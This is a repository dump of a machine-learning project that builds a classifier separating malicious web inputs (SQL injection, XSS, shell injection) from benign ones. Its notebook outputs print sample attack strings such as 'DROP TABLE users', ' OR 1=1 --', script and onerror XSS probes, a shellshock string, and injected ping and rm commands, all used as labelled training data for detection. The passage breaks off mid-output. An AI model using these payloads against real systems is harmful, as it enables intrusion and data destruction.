├── .gitignore
├── 0_Data_wrangling.ipynb
├── 1_Data_cleaning.ipynb
├── 2_Data_analysis.ipynb
├── LICENSE
├── Plots_technical_background.ipynb
├── README.md
├── data
    ├── JavascriptKeywords.txt
    ├── README.md
    ├── SQLCollection.txt
    ├── SQLKeywords.txt
    ├── ShellCollection.txt
    ├── XSSCollection.txt
    ├── non-maliciousCollection.txt
    ├── payloads.csv
    ├── tfidf_2grams_randomforest.p
    ├── trained_classifier_custom_4_features.p
    ├── trained_classifier_custom_5_features.p
    ├── trained_classifier_custom_6_features.p
    ├── trained_classifier_custom_7_features.p
    ├── trained_classifier_custom_8_features.p
    ├── trained_classifier_custom_9_features.p
    ├── trained_classifier_custom_all_features.p
    ├── trained_classifiers.p
    └── trained_classifiers_custom.p
├── demo-server
    ├── .angular-cli.json
    ├── .editorconfig
    ├── .gitignore
    ├── README.md
    ├── e2e
    │   ├── app.e2e-spec.ts
    │   ├── app.po.ts
    │   └── tsconfig.e2e.json
    ├── karma.conf.js
    ├── npm-debug.log.179372140
    ├── package.json
    ├── protractor.conf.js
    ├── pyserver.py
    ├── server.js
    ├── server
    │   └── routes
    │   │   └── api.js
    ├── src
    │   ├── app
    │   │   ├── app.component.css
    │   │   ├── app.component.html
    │   │   ├── app.component.spec.ts
    │   │   ├── app.component.ts
    │   │   ├── app.module.ts
    │   │   ├── classifier.service.spec.ts
    │   │   ├── classifier.service.ts
    │   │   └── classifier
    │   │   │   ├── classifier.component.css
    │   │   │   ├── classifier.component.html
    │   │   │   ├── classifier.component.spec.ts
    │   │   │   └── classifier.component.ts
    │   ├── assets
    │   │   └── .gitkeep
    │   ├── environments
    │   │   ├── environment.prod.ts
    │   │   └── environment.ts
    │   ├── favicon.ico
    │   ├── index.html
    │   ├── main.ts
    │   ├── polyfills.ts
    │   ├── styles.css
    │   ├── test.ts
    │   ├── tsconfig.app.json
    │   ├── tsconfig.spec.json
    │   └── typings.d.ts
    ├── tfidf_2grams_randomforest.p
    ├── tsconfig.json
    └── tslint.json
├── images
    ├── features
    │   ├── distinct-bytes.png
    │   ├── js-keywords.png
    │   ├── length.png
    │   ├── max-byte.png
    │   ├── mean-byte.png
    │   ├── min-byte.png
    │   ├── non-printable.png
    │   ├── punctuation.png
    │   ├── sql-keywords.png
    │   └── std-byte.png
    ├── presentation_tables
    │   ├── custom_features_table.png
    │   ├── f1_result_table.png
    │   └── ngrams_example.png
    └── report_images
    │   ├── 1gram_tfidf_randomforest_learningcurve.png
    │   ├── 1grams_count_pca.png
    │   ├── 3gram_count_multinomial_learningcurve.png
    │   ├── 3grams_tfidf_pca.png
    │   ├── SVM_kernel.png
    │   ├── bagofwords_example.png
    │   ├── classifier_example.png
    │   ├── classifiers_f1score.png
    │   ├── custom_pca.png
    │   ├── custom_svm_learningcurve.png
    │   ├── data_distribution.png
    │   ├── logistic.png
    │   ├── optimizing_example.png
    │   ├── roc_curves.png
    │   ├── roc_graph_topbot3.png
    │   └── website.png
└── report.pdf


/.gitignore:
--------------------------------------------------------------------------------
 1 | data/trained_classifiers.p
 2 | 
 3 | # Byte-compiled / optimized / DLL files
 4 | __pycache__/
 5 | *.py[cod]
 6 | *$py.class
 7 | 
 8 | # C extensions
 9 | *.so
10 | 
11 | # Distribution / packaging
12 | .Python
13 | env/
14 | build/
15 | develop-eggs/
16 | dist/
17 | downloads/
18 | eggs/
19 | .eggs/
20 | lib/
21 | lib64/
22 | parts/
23 | sdist/
24 | var/
25 | *.egg-info/
26 | .installed.cfg
27 | *.egg
28 | 
29 | # PyInstaller
30 | #  Usually these files are written by a python script from a template
31 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
32 | *.manifest
33 | *.spec
34 | 
35 | # Installer logs
36 | pip-log.txt
37 | pip-delete-this-directory.txt
38 | 
39 | # Unit test / coverage reports
40 | htmlcov/
41 | .tox/
42 | .coverage
43 | .coverage.*
44 | .cache
45 | nosetests.xml
46 | coverage.xml
47 | *,cover
48 | .hypothesis/
49 | 
50 | # Translations
51 | *.mo
52 | *.pot
53 | 
54 | # Django stuff:
55 | *.log
56 | local_settings.py
57 | 
58 | # Flask stuff:
59 | instance/
60 | .webassets-cache
61 | 
62 | # Scrapy stuff:
63 | .scrapy
64 | 
65 | # Sphinx documentation
66 | docs/_build/
67 | 
68 | # PyBuilder
69 | target/
70 | 
71 | # IPython Notebook
72 | .ipynb_checkpoints
73 | 
74 | # pyenv
75 | .python-version
76 | 
77 | # celery beat schedule file
78 | celerybeat-schedule
79 | 
80 | # dotenv
81 | .env
82 | 
83 | # virtualenv
84 | venv/
85 | ENV/
86 | 
87 | # Spyder project settings
88 | .spyderproject
89 | 
90 | # Rope project settings
91 | .ropeproject
92 | 


--------------------------------------------------------------------------------
/0_Data_wrangling.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "markdown",
  5 |    "metadata": {},
  6 |    "source": [
  7 |     "# Data Wrangling\n",
  8 |     "these functions below transform data from different formats into a single common format,  \n",
  9 |     "appends the transformed data to either ShellCollection.txt, SQLCollection.txt, XSSCollection.txt or non-maliciousCollection.txt, depending on type.  \n",
 10 |     "The last function in the notebook combines the text files into a single .csv file\n",
 11 |     "\n",
 12 |     "P.S! The source data files aren't included, so no need to run these scripts. You should start testing the project by starting in the Data Cleaning notebook!\n",
 13 |     "\n",
 14 |     "Source to original data:  \n",
 15 |     "https://github.com/foospidy/payloads/blob/master/get.sh  \n",
 16 |     "http://www.isi.csic.es/dataset/"
 17 |    ]
 18 |   },
 19 |   {
 20 |    "cell_type": "markdown",
 21 |    "metadata": {},
 22 |    "source": [
 23 |     "## Step1\n",
 24 |     "import dependencies"
 25 |    ]
 26 |   },
 27 |   {
 28 |    "cell_type": "code",
 29 |    "execution_count": 4,
 30 |    "metadata": {
 31 |     "collapsed": true
 32 |    },
 33 |    "outputs": [],
 34 |    "source": [
 35 |     "import numpy as np\n",
 36 |     "import pandas as pd\n",
 37 |     "import csv\n",
 38 |     "import re\n",
 39 |     "import json\n",
 40 |     "from IPython.display import display"
 41 |    ]
 42 |   },
 43 |   {
 44 |    "cell_type": "markdown",
 45 |    "metadata": {},
 46 |    "source": [
 47 |     "# Step2\n",
 48 |     "tranform data from source data set formats into the right format"
 49 |    ]
 50 |   },
 51 |   {
 52 |    "cell_type": "code",
 53 |    "execution_count": 112,
 54 |    "metadata": {},
 55 |    "outputs": [
 56 |     {
 57 |      "name": "stdout",
 58 |      "output_type": "stream",
 59 |      "text": [
 60 |       "Number of SQL injection data points: 286\n",
 61 |       "First 5 SQL injection data points:\n"
 62 |      ]
 63 |     },
 64 |     {
 65 |      "data": {
 66 |       "text/plain": [
 67 |        "432          1;DROP TABLE users\n",
 68 |        "433    1'; DROP TABLE users-- 1\n",
 69 |        "434               ' OR 1=1 -- 1\n",
 70 |        "435                 ' OR '1'='1\n",
 71 |        "760                 ’ or ‘1’=’1\n",
 72 |        "Name: Payload, dtype: object"
 73 |       ]
 74 |      },
 75 |      "metadata": {},
 76 |      "output_type": "display_data"
 77 |     },
 78 |     {
 79 |      "name": "stdout",
 80 |      "output_type": "stream",
 81 |      "text": [
 82 |       "Number of XSS injection data points: 1115\n",
 83 |       "First 5 XSS injection data points:\n"
 84 |      ]
 85 |     },
 86 |     {
 87 |      "data": {
 88 |       "text/plain": [
 89 |        "0                     script>alert(123)</script>\n",
 90 |        "1      <script>alert(\"hellox worldss\");</script>\n",
 91 |        "2             javascript:alert(\"hellox worldss\")\n",
 92 |        "3           <img src=\"javascript:alert('XSS');\">\n",
 93 |        "4    <img src=javascript:alert(&quot;XSS&quot;)>\n",
 94 |        "Name: Payload, dtype: object"
 95 |       ]
 96 |      },
 97 |      "metadata": {},
 98 |      "output_type": "display_data"
 99 |     }
100 |    ],
101 |    "source": [
102 |     "def from_google_spreadsheet_to_collections(file):\n",
103 |     "    '''Converts web traffic payloads from csv file to right format into collections \n",
104 |     "\n",
105 |     "    the input format of the data points are:\n",
106 |     "    <is malicious>,<Injection type>,<Payload>\n",
107 |     "    '''\n",
108 |     "    \n",
109 |     "    df = pd.read_csv(\"data/{}.csv\".format(file))\n",
110 |     "    \n",
111 |     "    #extract injection data\n",
112 |     "    sql_data  = df['Payload'][df['Injection Type'] == 'SQL']\n",
113 |     "    xss_data  = df['Payload'][df['Injection Type'] == 'XSS']\n",
114 |     "\n",
115 |     "    print('Number of SQL injection data points: ' + str(len(sql_data)))\n",
116 |     "    print('First 5 SQL injection data points:')\n",
117 |     "    display(sql_data[:5])\n",
118 |     "\n",
119 |     "    print('Number of XSS injection data points: ' + str(len(xss_data)))\n",
120 |     "    print('First 5 XSS injection data points:')\n",
121 |     "    display(xss_data[:5])\n",
122 |     "    \n",
123 |     "    with open(\"data/SQLCollection.txt\", \"a\") as myfile:\n",
124 |     "        for sql_row in sql_data:\n",
125 |     "            myfile.write('{}\\n'.format(sql_row.encode(\"utf-8\")))\n",
126 |     "            \n",
127 |     "    with open(\"data/XSSCollection.txt\",\"a\") as myfile:\n",
128 |     "        for xss_row in xss_data:\n",
129 |     "            myfile.write('{}\\n'.format(xss_row.encode(\"utf-8\")))\n",
130 |     "    pass      \n",
131 |     "\n",
132 |     "#IPS_payload_data is our spreadsheet of payloads gathered so far\n",
133 |     "from_google_spreadsheet_to_collections('IPS_payload_data')\n"
134 |    ]
135 |   },
136 |   {
137 |    "cell_type": "code",
138 |    "execution_count": 124,
139 |    "metadata": {},
140 |    "outputs": [
141 |     {
142 |      "name": "stdout",
143 |      "output_type": "stream",
144 |      "text": [
145 |       "raw data in source file format: Directory Traversal - For Unix##/../../../../file##0\n",
146 |       "\n",
147 |       "modified data in right format: /../../../../file\n",
148 |       " 91\n"
149 |      ]
150 |     }
151 |    ],
152 |    "source": [
153 |     "def from_xsuperbug_to_collections(src_file, dest_file):\n",
154 |     "    '''Converts web traffic payloads from xsuperbug's format to the right format into collections \n",
155 |     "    \n",
156 |     "    the input format of the data points are:\n",
157 |     "    <injections type>##<Payload>##<number>\n",
158 |     "    '''\n",
159 |     "    \n",
160 |     "    lines = open(\"data/{}\".format(src_file),\"r\").readlines()\n",
161 |     "    print('raw data in source file format: ' + lines[0])\n",
162 |     "    lines = [ re.search(r'(.*)##(.*)##[0-9]',line).group(2) for line in lines]\n",
163 |     "    print('modified data in right format: ' + lines[0])\n",
164 |     "    print(' ' + str(len(lines)))\n",
165 |     "    \n",
166 |     "    with open(\"data/{}\".format(dest_file), \"a\") as myfile:\n",
167 |     "        for line in lines:\n",
168 |     "            myfile.write('{}\\n'.format(line.encode(\"utf-8\")))\n",
169 |     "    \n",
170 |     "#from_xsuperbug_to_collections('timetoparseSQL.txt','SQLCollection.txt')\n",
171 |     "#from_xsuperbug_to_collections('timetoparseXSS.txt','XSSCollection.txt')\n",
172 |     "from_xsuperbug_to_collections('timetoparseCMD.txt','ShellCollection.txt')"
173 |    ]
174 |   },
175 |   {
176 |    "cell_type": "code",
177 |    "execution_count": 109,
178 |    "metadata": {
179 |     "collapsed": true
180 |    },
181 |    "outputs": [],
182 |    "source": [
183 |     "def from_cnets_to_collection(src_file, dest_file):\n",
184 |     "    '''Converts web traffic payloads from CNetS' web traffic data set format to the right format into collections\n",
185 |     "    \n",
186 |     "    source data set found here: http://cnets.indiana.edu/resources/data-repository/\n",
187 |     "    the input file is in JSON format and the input format of the data points are:\n",
188 |     "    {\"count\": <number>, \"timestamp\": <Date>, \"from\": \"<Website>/<Payload1>\", \"to\": \"<Website>/<Payload2>\"}\n",
189 |     "    '''\n",
190 |     "    raw_data = []\n",
191 |     "    \n",
192 |     "    with open(\"data/{}.json\".format(src_file)) as f:\n",
193 |     "        for line in f.readlines():\n",
194 |     "            raw_data.append(json.loads(line))\n",
195 |     "    \n",
196 |     "    #Extract 'from' and 'to' columns\n",
197 |     "    data = pd.Series([obj['from'] for obj in raw_data] + [obj['to'] for obj in raw_data]) \n",
198 |     "    \n",
199 |     "    #Remove empty elements\n",
200 |     "    data = data[data != '']\n",
201 |     "    \n",
202 |     "    \n",
203 |     "    #Extract data containing payloads, i.e. containing the '=' sign followed by a word\n",
204 |     "    data = data[ [re.match(r'(.*)=(.+)',x) != None for x in data] ]\n",
205 |     "    \n",
206 |     "    payloads = []\n",
207 |     "    \n",
208 |     "    #extract each input from the entire payload string\n",
209 |     "    for payload in data:\n",
210 |     "        temp = payload.split('&')\n",
211 |     "        payloads = payloads + [substring.split('=')[1] for substring in temp if len(substring.split('=')) > 1]\n",
212 |     "    \n",
213 |     "    #write to destination file\n",
214 |     "    with open(\"data/{}\".format(dest_file), \"a\") as myfile:\n",
215 |     "        for payload in payloads:\n",
216 |     "            if payload != '':\n",
217 |     "                myfile.write('{}\\n'.format(payload))\n",
218 |     "\n",
219 |     "#There are 21 files with non-malicious payloads, each with its date as name\n",
220 |     "for i in range(1,22):\n",
221 |     "    date = '0' + str(i) if i < 10  else str(i)\n",
222 |     "    from_cnets_to_collection('2009-11-{}'.format(date),'non-maliciousCollection.txt')\n"
223 |    ]
224 |   },
225 |   {
226 |    "cell_type": "code",
227 |    "execution_count": 22,
228 |    "metadata": {},
229 |    "outputs": [
230 |     {
231 |      "name": "stdout",
232 |      "output_type": "stream",
233 |      "text": [
234 |       "Total payloads found: 2929\n",
235 |       "First 20 payloads:\n"
236 |      ]
237 |     },
238 |     {
239 |      "data": {
240 |       "text/plain": [
241 |        "['',\n",
242 |        " '(173-95)',\n",
243 |        " '1331994300888',\n",
244 |        " 'results',\n",
245 |        " '1331736235',\n",
246 |        " '(63245-posstr(chr(97),chr(97))+53475)',\n",
247 |        " 'otcymtc0',\n",
248 |        " 'ping\\\\x0c-w\\\\x0c7000\\\\x0c-n\\\\x0c1\\\\x0c1.2.3.4',\n",
249 |        " '1331910623.41',\n",
250 |        " 'rm\\\\x09q92179245',\n",
251 |        " 'del\\\\x0cq61251932',\n",
252 |        " '1331749591',\n",
253 |        " 'ping,-w,11000,-n,1,4.3.2.1|rem,',\n",
254 |        " 'ota3nzyw@',\n",
255 |        " 'register',\n",
256 |        " 'http://xxxxxxxx/1',\n",
257 |        " 'linpha_order_sql_injection.nasl_1332008614',\n",
258 |        " '\\\\x0ddel q74771226 #',\n",
259 |        " '1331884972314',\n",
260 |        " 'all']"
261 |       ]
262 |      },
263 |      "metadata": {},
264 |      "output_type": "display_data"
265 |     }
266 |    ],
267 |    "source": [
268 |     "def from_fsecurify_to_collection(src_file, dest_file):\n",
269 |     "    '''Extracts payload data inputs from address strings\n",
270 |     "    \n",
271 |     "    source data set found here: \n",
272 |     "    https://raw.githubusercontent.com/faizann24/Fwaf-Machine-Learning-driven-Web-Application-Firewall/master/goodqueries.txt\n",
273 |     "    \n",
274 |     "    the format of the data points are:\n",
275 |     "    <Website local path>?<Payload>\n",
276 |     "    example: folder1/folder2?var1=payloadData\n",
277 |     "    '''\n",
278 |     "    payloads = []\n",
279 |     "    \n",
280 |     "    with open(\"data/{}\".format(src_file)) as f:\n",
281 |     "        for line in f.readlines():\n",
282 |     "            splitted_address = line.split('?')\n",
283 |     "            \n",
284 |     "            #if there is payload\n",
285 |     "            if len(splitted_address) > 1:\n",
286 |     "                total_payload = splitted_address[1]\n",
287 |     "                temp = total_payload.split('&')\n",
288 |     "                \n",
289 |     "                #Add all input data from payload \n",
290 |     "                #exclude input that contains http://192.168.202 (these were strange local queries)\n",
291 |     "                #exclude input that contains the word 'select' AND 'union' (these were actually malicious)\n",
292 |     "                payloads = payloads + [substring.split('=')[1].strip('\\n') for substring in temp \n",
293 |     "                                       if len(substring.split('=')) > 1 and\n",
294 |     "                                       'http://192.168.202' not in substring.split('=')[1] and\n",
295 |     "                                       ('select' not in substring.split('=')[1] or 'union' not in substring.split('=')[1])\n",
296 |     "                                      ]\n",
297 |     "    #remove duplicates\n",
298 |     "    payloads = list(set(payloads))\n",
299 |     "                \n",
300 |     "    #write to destination file\n",
301 |     "    with open(\"data/{}\".format(dest_file), \"a\") as myfile:\n",
302 |     "        for payload in payloads:\n",
303 |     "            if payload != '':\n",
304 |     "                myfile.write('{}\\n'.format(payload))\n",
305 |     "        \n",
306 |     "    print('Total payloads found: '+str(len(payloads)))\n",
307 |     "    print('First 20 payloads:')\n",
308 |     "    display(payloads[:20])\n",
309 |     "\n",
310 |     "        \n",
311 |     "from_fsecurify_to_collection('goodqueries.txt','non-maliciousCollection.txt')"
312 |    ]
313 |   },
314 |   {
315 |    "cell_type": "code",
316 |    "execution_count": 35,
317 |    "metadata": {},
318 |    "outputs": [
319 |     {
320 |      "name": "stdout",
321 |      "output_type": "stream",
322 |      "text": [
323 |       "Total number of data points gathered: 19344\n",
324 |       "First 20 data points:\n"
325 |      ]
326 |     },
327 |     {
328 |      "data": {
329 |       "text/plain": [
330 |        "['shuster',\n",
331 |        " '3288111380573813',\n",
332 |        " '7315',\n",
333 |        " 'Calle+Montesol+30%2C+',\n",
334 |        " 'woolwine0',\n",
335 |        " '25742430W',\n",
336 |        " 'Ramiro+De+Maeztu%2C+S%2FN+8C',\n",
337 |        " '02054707W',\n",
338 |        " 'violet%40sunmiles.cf',\n",
339 |        " 'oxley%40muevetuweb.lb',\n",
340 |        " 'arena%40productosgarantizados.uy',\n",
341 |        " 'cioffi',\n",
342 |        " '7961872329809538',\n",
343 |        " '8622247853302054',\n",
344 |        " 'roquemore%40veocime.bu',\n",
345 |        " 'oke',\n",
346 |        " 'oblong0',\n",
347 |        " 'Del+Barrio',\n",
348 |        " 'cEgaJOSo',\n",
349 |        " 'shashi']"
350 |       ]
351 |      },
352 |      "metadata": {},
353 |      "output_type": "display_data"
354 |     },
355 |     {
356 |      "name": "stdout",
357 |      "output_type": "stream",
358 |      "text": [
359 |       "Total number of data points gathered: 20035\n",
360 |       "First 20 data points:\n"
361 |      ]
362 |     },
363 |     {
364 |      "data": {
365 |       "text/plain": [
366 |        "['Sigrid',\n",
367 |        " 'Calle+Osa+Mayor+S%2FN%2C+4-G',\n",
368 |        " '09348',\n",
369 |        " 'Ataquines',\n",
370 |        " '7739977532136253',\n",
371 |        " '7315',\n",
372 |        " '2340',\n",
373 |        " 'Presentaci%F3n',\n",
374 |        " 'Mallabia',\n",
375 |        " '7539210731606782',\n",
376 |        " 'kirkland',\n",
377 |        " 'Kimberley',\n",
378 |        " '54375556Z',\n",
379 |        " '51928951B',\n",
380 |        " 'darfeuil%40naturalchild.lc',\n",
381 |        " 'hsaio%40suecas.com.ec',\n",
382 |        " '4587377607226524',\n",
383 |        " 'medeiros',\n",
384 |        " 'toshi',\n",
385 |        " 'Edesio']"
386 |       ]
387 |      },
388 |      "metadata": {},
389 |      "output_type": "display_data"
390 |     }
391 |    ],
392 |    "source": [
393 |     "def from_CSIC2010_to_collection(src_file, dest_file):\n",
394 |     "    '''Extracts payload data inputs from CSIC2010 HTTP packet dataset\n",
395 |     "    \n",
396 |     "    source dataset found here: http://www.isi.csic.es/dataset/\n",
397 |     "    input format from source is a complete HTTP packet\n",
398 |     "    '''\n",
399 |     "    \n",
400 |     "    payloads = []\n",
401 |     "    payload_next_line = False\n",
402 |     "    \n",
403 |     "    with open(\"data/{}\".format(src_file)) as f:\n",
404 |     "        for line in f.readlines():\n",
405 |     "            \n",
406 |     "            #Extract inputs from payload if first row in a GET packet\n",
407 |     "            if line.startswith('GET') and len(line.split('?')) > 1:\n",
408 |     "                \n",
409 |     "                #extract total payload string\n",
410 |     "                total_payload = (line.split('?')[1]).split(' ')[0]\n",
411 |     "                \n",
412 |     "                #add each input value separately to payloads\n",
413 |     "                inputs = total_payload.split('&')\n",
414 |     "                payloads = payloads + [input.split('=')[1] for input in inputs if len(input.split('=')) > 1]\n",
415 |     "                \n",
416 |     "            if line.startswith('Content-Length'):\n",
417 |     "                #notify that this is a HTTP POST packet and the next line will contain the payload\n",
418 |     "                payload_next_line = True\n",
419 |     "                \n",
420 |     "            elif payload_next_line and len(line) > 2:\n",
421 |     "                #Current line is a payload of a HTTP POST packet\n",
422 |     "                \n",
423 |     "                #add each input value separately to payloads\n",
424 |     "                inputs = line.split('&')\n",
425 |     "                payloads = payloads + [input.split('=')[1].strip('\\n') for input in inputs if len(input.split('=')) > 1]\n",
426 |     "                \n",
427 |     "                payload_next_line = False\n",
428 |     "       \n",
429 |     "    payloads = list(set(payloads))\n",
430 |     "\n",
431 |     "    #write to destination file\n",
432 |     "    with open(\"data/{}\".format(dest_file), \"a\") as myfile:\n",
433 |     "        for payload in payloads:\n",
434 |     "            if payload != '':\n",
435 |     "                myfile.write('{}\\n'.format(payload))\n",
436 |     "\n",
437 |     "    print('Total number of data points gathered: ' + str(len(payloads)))\n",
438 |     "    print('First 20 data points:')\n",
439 |     "    display(payloads[:20])\n",
440 |     "    \n",
441 |     "from_CSIC2010_to_collection('normalTrafficTraining.txt','non-maliciousCollection.txt')\n",
442 |     "from_CSIC2010_to_collection('normalTrafficTest.txt','non-maliciousCollection.txt')"
443 |    ]
444 |   }
445 |  ],
446 |  "metadata": {
447 |   "kernelspec": {
448 |    "display_name": "Python 3",
449 |    "language": "python",
450 |    "name": "python3"
451 |   },
452 |   "language_info": {
453 |    "codemirror_mode": {
454 |     "name": "ipython",
455 |     "version": 3
456 |    },
457 |    "file_extension": ".py",
458 |    "mimetype": "text/x-python",
459 |    "name": "python",
460 |    "nbconvert_exporter": "python",
461 |    "pygments_lexer": "ipython3",
462 |    "version": "3.5.3"
463 |   }
464 |  },
465 |  "nbformat": 4,
466 |  "nbformat_minor": 2
467 | }
468 | 


--------------------------------------------------------------------------------
/1_Data_cleaning.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "markdown",
  5 |    "metadata": {},
  6 |    "source": [
  7 |     "# Data cleaning\n",
  8 |     "After gathering all the data (see the report and Data_wrangling.ipynb) it is time to clean the data.\n",
  9 |     "The cleaning phase follow these steps:\n",
 10 |     "- Load all the collection txt files into a labeled pandas dataframe\n",
 11 |     "- Remove empty data points, and remove malicious data points of length 1\n",
 12 |     "- Remove any duplicates\n",
 13 |     "- Shuffle the dataset to remove any ordering bias\n",
 14 |     "- Store into a .csv file for visualization and also store the dataframe into a .pickle file to easily allow further computations on the data set"
 15 |    ]
 16 |   },
 17 |   {
 18 |    "cell_type": "markdown",
 19 |    "metadata": {},
 20 |    "source": [
 21 |     "## Step1\n",
 22 |     "Import dependencies"
 23 |    ]
 24 |   },
 25 |   {
 26 |    "cell_type": "code",
 27 |    "execution_count": 1,
 28 |    "metadata": {
 29 |     "collapsed": true
 30 |    },
 31 |    "outputs": [],
 32 |    "source": [
 33 |     "import numpy as np\n",
 34 |     "import pandas as pd\n",
 35 |     "import csv\n",
 36 |     "from IPython.display import display"
 37 |    ]
 38 |   },
 39 |   {
 40 |    "cell_type": "markdown",
 41 |    "metadata": {},
 42 |    "source": [
 43 |     "## Step2\n",
 44 |     "Compute a pandas dataframe with the payloads from the different collections  \n",
 45 |     "dataframe columns:  \n",
 46 |     "$<is\\_malicious> | <injection\\_type> | <payload>$  \n",
 47 |     "example: \n",
 48 |     "$1 | SQL | ' OR 1=1 LIMIT 1 #$"
 49 |    ]
 50 |   },
 51 |   {
 52 |    "cell_type": "code",
 53 |    "execution_count": 2,
 54 |    "metadata": {},
 55 |    "outputs": [
 56 |     {
 57 |      "name": "stdout",
 58 |      "output_type": "stream",
 59 |      "text": [
 60 |       "First 5 lines of SQL\n"
 61 |      ]
 62 |     },
 63 |     {
 64 |      "data": {
 65 |       "text/html": [
 66 |        "<div>\n",
 67 |        "<table border=\"1\" class=\"dataframe\">\n",
 68 |        "  <thead>\n",
 69 |        "    <tr style=\"text-align: right;\">\n",
 70 |        "      <th></th>\n",
 71 |        "      <th>payload</th>\n",
 72 |        "      <th>is_malicious</th>\n",
 73 |        "      <th>injection_type</th>\n",
 74 |        "    </tr>\n",
 75 |        "  </thead>\n",
 76 |        "  <tbody>\n",
 77 |        "    <tr>\n",
 78 |        "      <th>0</th>\n",
 79 |        "      <td>'\\n</td>\n",
 80 |        "      <td>1</td>\n",
 81 |        "      <td>SQL</td>\n",
 82 |        "    </tr>\n",
 83 |        "    <tr>\n",
 84 |        "      <th>1</th>\n",
 85 |        "      <td>a' or 1=1-- \\n</td>\n",
 86 |        "      <td>1</td>\n",
 87 |        "      <td>SQL</td>\n",
 88 |        "    </tr>\n",
 89 |        "    <tr>\n",
 90 |        "      <th>2</th>\n",
 91 |        "      <td>\"a\"\" or 1=1--\"\\n</td>\n",
 92 |        "      <td>1</td>\n",
 93 |        "      <td>SQL</td>\n",
 94 |        "    </tr>\n",
 95 |        "    <tr>\n",
 96 |        "      <th>3</th>\n",
 97 |        "      <td>or a = a\\n</td>\n",
 98 |        "      <td>1</td>\n",
 99 |        "      <td>SQL</td>\n",
100 |        "    </tr>\n",
101 |        "    <tr>\n",
102 |        "      <th>4</th>\n",
103 |        "      <td>a' or 'a' = 'a\\n</td>\n",
104 |        "      <td>1</td>\n",
105 |        "      <td>SQL</td>\n",
106 |        "    </tr>\n",
107 |        "  </tbody>\n",
108 |        "</table>\n",
109 |        "</div>"
110 |       ],
111 |       "text/plain": [
112 |        "            payload  is_malicious injection_type\n",
113 |        "0              '\\n             1            SQL\n",
114 |        "1    a' or 1=1-- \\n             1            SQL\n",
115 |        "2  \"a\"\" or 1=1--\"\\n             1            SQL\n",
116 |        "3        or a = a\\n             1            SQL\n",
117 |        "4  a' or 'a' = 'a\\n             1            SQL"
118 |       ]
119 |      },
120 |      "metadata": {},
121 |      "output_type": "display_data"
122 |     },
123 |     {
124 |      "name": "stdout",
125 |      "output_type": "stream",
126 |      "text": [
127 |       "First 5 lines of XSS\n"
128 |      ]
129 |     },
130 |     {
131 |      "data": {
132 |       "text/html": [
133 |        "<div>\n",
134 |        "<table border=\"1\" class=\"dataframe\">\n",
135 |        "  <thead>\n",
136 |        "    <tr style=\"text-align: right;\">\n",
137 |        "      <th></th>\n",
138 |        "      <th>payload</th>\n",
139 |        "      <th>is_malicious</th>\n",
140 |        "      <th>injection_type</th>\n",
141 |        "    </tr>\n",
142 |        "  </thead>\n",
143 |        "  <tbody>\n",
144 |        "    <tr>\n",
145 |        "      <th>0</th>\n",
146 |        "      <td>data:text/html;alert(1)/*,&lt;svg%20onload=eval(...</td>\n",
147 |        "      <td>1</td>\n",
148 |        "      <td>XSS</td>\n",
149 |        "    </tr>\n",
150 |        "    <tr>\n",
151 |        "      <th>1</th>\n",
152 |        "      <td>'\"&gt;*/--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script%0A...</td>\n",
153 |        "      <td>1</td>\n",
154 |        "      <td>XSS</td>\n",
155 |        "    </tr>\n",
156 |        "    <tr>\n",
157 |        "      <th>2</th>\n",
158 |        "      <td>\" onclick=alert(1)//&lt;button ‘ onclick=alert(1)...</td>\n",
159 |        "      <td>1</td>\n",
160 |        "      <td>XSS</td>\n",
161 |        "    </tr>\n",
162 |        "    <tr>\n",
163 |        "      <th>3</th>\n",
164 |        "      <td>';alert(String.fromCharCode(88,83,83))//';aler...</td>\n",
165 |        "      <td>1</td>\n",
166 |        "      <td>XSS</td>\n",
167 |        "    </tr>\n",
168 |        "    <tr>\n",
169 |        "      <th>4</th>\n",
170 |        "      <td>\"&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/ma...</td>\n",
171 |        "      <td>1</td>\n",
172 |        "      <td>XSS</td>\n",
173 |        "    </tr>\n",
174 |        "  </tbody>\n",
175 |        "</table>\n",
176 |        "</div>"
177 |       ],
178 |       "text/plain": [
179 |        "                                             payload  is_malicious  \\\n",
180 |        "0  data:text/html;alert(1)/*,<svg%20onload=eval(...             1   \n",
181 |        "1  '\">*/--></title></style></textarea></script%0A...             1   \n",
182 |        "2  \" onclick=alert(1)//<button ‘ onclick=alert(1)...             1   \n",
183 |        "3  ';alert(String.fromCharCode(88,83,83))//';aler...             1   \n",
184 |        "4  \">><marquee><img src=x onerror=confirm(1)></ma...             1   \n",
185 |        "\n",
186 |        "  injection_type  \n",
187 |        "0            XSS  \n",
188 |        "1            XSS  \n",
189 |        "2            XSS  \n",
190 |        "3            XSS  \n",
191 |        "4            XSS  "
192 |       ]
193 |      },
194 |      "metadata": {},
195 |      "output_type": "display_data"
196 |     },
197 |     {
198 |      "name": "stdout",
199 |      "output_type": "stream",
200 |      "text": [
201 |       "First 5 lines of SHELL\n"
202 |      ]
203 |     },
204 |     {
205 |      "data": {
206 |       "text/html": [
207 |        "<div>\n",
208 |        "<table border=\"1\" class=\"dataframe\">\n",
209 |        "  <thead>\n",
210 |        "    <tr style=\"text-align: right;\">\n",
211 |        "      <th></th>\n",
212 |        "      <th>payload</th>\n",
213 |        "      <th>is_malicious</th>\n",
214 |        "      <th>injection_type</th>\n",
215 |        "    </tr>\n",
216 |        "  </thead>\n",
217 |        "  <tbody>\n",
218 |        "    <tr>\n",
219 |        "      <th>0</th>\n",
220 |        "      <td>() { 0; }; touch /tmp/blns.shellshock1.fail;\\n</td>\n",
221 |        "      <td>1</td>\n",
222 |        "      <td>SHELL</td>\n",
223 |        "    </tr>\n",
224 |        "    <tr>\n",
225 |        "      <th>1</th>\n",
226 |        "      <td>() { _; } &gt;_[$($())] { touch /tmp/blns.shellsh...</td>\n",
227 |        "      <td>1</td>\n",
228 |        "      <td>SHELL</td>\n",
229 |        "    </tr>\n",
230 |        "    <tr>\n",
231 |        "      <th>2</th>\n",
232 |        "      <td>&lt;&lt;&lt; %s(un='%s') = %u\\n</td>\n",
233 |        "      <td>1</td>\n",
234 |        "      <td>SHELL</td>\n",
235 |        "    </tr>\n",
236 |        "    <tr>\n",
237 |        "      <th>3</th>\n",
